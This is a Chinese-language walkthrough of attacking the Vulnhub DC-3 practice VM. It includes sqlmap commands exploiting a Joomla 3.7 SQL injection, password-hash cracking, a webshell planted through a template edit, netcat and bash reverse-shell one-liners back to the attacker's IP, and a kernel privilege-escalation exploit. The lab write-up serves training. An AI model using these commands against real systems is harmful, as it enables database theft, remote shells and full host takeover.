本信息

Kali:192.168.61.145

DC3:192.168.61.163

实验过程

同样先通过arpscan扫描找出DC3的IP地址

sudo arp‐scan ‐‐interface eth0 192.168.61.1/24

这里可以直接看出DC3的IP地址为192.168.61.163

然后我们使用nmap对目标进行扫描

发现目标主机只是打开了80端口

然后我们查看下80端口,通过wappalyzer,发现用的是Joomla

同时主页也给我们提示,表明这个靶机只有一个flag

这里我们使用joomscan专用扫描器,来获取网页更详细的信息

joomscan:https://github.com/OWASP/joomscan

perl joomscan.pl ‐u http://192.168.61.163

可以看到joomla的详细版本号和管理后台

我们通过searchsploit查看是否有可以用的EXP

searchsploit joomla 3.7

可以看到有一个SQL注入漏洞

searchsploit ‐x php/webapps/42033.txt

sqlmap -u "http://192.168.61.163/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

接下来就是导出admin的账号密码,就只放个最后的结果图,攻击过程的语句如下:

sqlmap -u "http://192.168.61.163/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27" --risk=3 --level=5 --random-agent -p list[fullordering] -D joomaladb --tablessqlmap -u "http://192.168.61.163/index.php?
option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27" ‐‐risk=3 ‐‐
level=5 ‐‐random‐agent ‐p list[fullordering] ‐D joomladb ‐T "#__users" ‐‐columnssqlmap ‐u "http://192.168.61.163/index.php?
option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27" ‐‐risk=3 ‐‐
level=5 ‐‐random‐agent ‐p list[fullordering] ‐D joomladb ‐T "#__users" ‐C "username,password" ‐‐dump

我们将password的HASH值用john进行破解

解密后的结果为:snoopy

我们尝试进行登陆,发现是正确的账号密码

账号:admin密码:snoopy

进入后台后,就要想办法上传一句话木马。百度到可以编辑模板来上传一个webshell

这里编辑Beez3模板

这里我在html目录下创建了一个名为dfz.php的webshell

然后我们访问下这个webshell,没有出现404说明成功上传

http://192.168.61.163/templates/beez3/html/dfz.php

接下来用蚁剑来链接

我们在Kali上使用nc,通过蚁剑反弹一个shell

我们现在Kali上建立监听

发现DC3上有python环境,尝试使用python来弹shell,但是Kali上没有任何反应

然后尝试使用bash来弹shell,但是也是不行

尝试使用nc反弹成功

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh ‐i 2>&1|nc 192.168.61.145 2222 >/tmp/f

然后使用python改善shell环境

python ‐c "import pty;pty.spawn('/bin/bash')"

获取下Linux版本,可以看到是Ubuntu 16.04

我们查找下有没有可以利用的提权EXP,通过searchsploit有好几个

这里我们使用下面的EXP尝试提权

​​​​​​​

Linux Kernel 4.4.x (Ubuntu 16.04) ‐ 'double‐fdput()' bpf(BPF_PROG_LOAD) PrivilegeEscalation                                               | linux/local/39772.txt

我们打开这个EXP的介绍,并到指定网站下载

https://github.com/offensive‐security/exploitdb‐bin‐sploits/blob/master/bin‐sploits/39772.zip

通过蚁剑上传到靶机

然后接下来的话就是解压、编译、执行EXP来获得root权限,所有命令如下

unzip 39772.zipcd 39772tar ‐xvf exploit.tar

./compile.sh

./doubleput

获得flag

额外补充

利用php反弹shell

system("bash ‐c 'bash ‐i >& /dev/tcp/192.168.61.145/2222 0>&1'");

system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh ‐i 2>&1|nc 192.168.61.145 2222>/tmp/f');

使用Linux-Exploit-suggestion来辅助提权

下载地址:https://github.com/mzet-/linux-exploit-suggester

上传到/tmp中,并加权执行

chmod +x linux‐exploit‐suggester.sh

这里尝试下CVE-2016-5195

EXP地址:https://github.com/gbonacini/CVE-2016-5195

下载完成后通过蚁剑上传,并解压

然后进入目录后make下就可以得到dcow文件,执行./dcow -s 尝试提权

然后靶机就死机了,说明这个EXP不适合

【Vulnhub靶机系列】DC3相关推荐

  1. Vulnhub靶机实战——DC-3

    靶机DC-3下载地址:https : //download.vulnhub.com/dc/DC-3.zip 靶机DC-3VMware下载地址:https : //download.vulnhub.co ...

  2. Vulnhub靶机系列:SecTalks: BNE0x03 - Simple

    这次的靶机是vulnhub靶机:SecTalks: BNE0x03 - Simple 文章目录 靶机地址及相关描述 靶机地址 靶机描述 Simple CTF Location Hints 靶机设置 利 ...

  3. 【Vulnhub靶机系列】DC2

    基本信息 Kali:192.168.61.145 DC2:192.168.61.162 实验过程 在Kali中先进行内网探活 sudo arp-scan --interface eth0 192.16 ...

  4. 【Vulnhub靶机系列】DC1

    基本信息 Kali: 192.168.56.116 DC1: 192.168.56.115 实验过程 先在Kali中使用arp-scan进行主机探活 sudo arp-scan --interface ...

  5. VulnHub靶机系列:Os-ByteSec

    一 前言 Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行.每个镜像 ...

  6. vulnhub DC系列 DC-3

    总结:joomscan工具的使用,cve-2016-4557内核提权或者cve-2021-4034内核提权 下载地址 漏洞分析 信息收集 sql注入 写马 提权 反弹shell 内核提权 cve-20 ...

  7. 【VulnHub靶机渗透】三:Billu_b0x

    VulnHub是一个安全平台,内含众多渗透测试的靶场镜像,只需要下载至本地并在虚拟机上运行,即可得到一个完整的渗透测试练习系统,每一个靶机都有相关目标去完成(万分感谢提供靶机镜像的同学). 文章目录 ...

  8. Vulnhub靶机DC系列-DC-8

    Vulnhub靶机DC系列-DC-8 靶场名称:DC-8 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ 下载地址: DC-8.zip (Size: 379 ...

  9. [网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)

    这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...

最新文章

  1. 建立循环单链表(尾插法)
  2. Where we can find sharepoint user list
  3. 阿里、小米、美团或将入恒指,但这还远远不够!
  4. 安卓应用自动化测试工具汇总
  5. android原生webview,Android 原生与WebView JS的交互
  6. Oracle错误集!
  7. 作者:姚前(1970-),男,中国人民银行征信中心副主任、高级工程师,主要研究方向为分布式系统和计算机安全。...
  8. ssm实现管理员和用户_基于SSM的网上水果生鲜超市商城管理系统
  9. tinymce vue 部分工具不显示_工具栏图标未在tinymce(4.0.1)文本编辑器中显示
  10. 无法从服务器同步注册表数据,辅助域控和主域控无法同步?!!
  11. 频数直方图的步骤_如何运用QC七大手法和九大步骤分析问题?
  12. LeetCode 525 连续数组/剑指 Offer II 011. 0 和 1 个数相同的子数组
  13. C调用Python的崩溃
  14. 图解排序算法之堆排序(Java)
  15. svnadmin hotcopy整库拷贝方式(转载)
  16. Arcgis(三)——重分类
  17. QT从字体名获取字库文件路径(从宋体获取到simsun.ttc)
  18. python开发qq聊天机器人_python3+qqBot+图灵机器人实现qq聊天机器人
  19. 人物画像及“七步人物角色法”
  20. echart-pie

热门文章

  1. matlab求矩阵中值函数,matlab在一个函数里,如何调用另一个函数里面求得的雅可比矩阵并赋值?...
  2. python第一周心得体会_Python学习第一周学习总结
  3. 分布式事务理论(学习笔记)
  4. 归并排序,快速排序,冒泡排序,选择排序,基数排序,桶排序,堆排序(c++实现)
  5. 彻底解决网络爬虫遇到的中文乱码问题
  6. elasticsearch_script_01
  7. 【已解决】Error: Module not specified (IntelliJ IDEA)
  8. 【图示】小程序云开发和不使用云开发的区别
  9. 15行代码AC——习题3-1 得分 (UVa1585,Score)
  10. ae saber插件_入门AE:影视特效中的黑洞是怎么做的?附带教程